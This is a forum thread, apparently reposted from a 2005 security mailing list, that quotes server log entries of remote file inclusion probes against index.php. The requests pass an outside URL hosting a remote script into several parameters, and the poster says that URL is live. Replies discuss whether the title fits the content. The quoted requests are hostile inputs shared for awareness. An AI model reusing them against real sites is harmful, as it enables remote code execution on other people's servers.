[转载]PHP Command and Safemode
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])looks like CSE exploit is circulating again...
found several queries today from server log
anyone confirms?
"GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?id=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035
"-" "Python-urllib/2.4"
"GET /index.php?action=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?include=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?site=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
this url is hot and working right now so handle with care... 问个问题.这个标题好象和文章内容不相符啊..文章是一个用python脚本利用的一个php文件include漏洞的web log文件.和safemode有什么关系? 他的原来题目是[b]PHP Command/Safemode Exploit[/b]
我觉得8大合适 所以把exp那几个字去掉了...
原始连接如下:
[url]http://seclists.org/lists/fulldisclosure/2005/Jul/0650.html[/url]
页:
[1]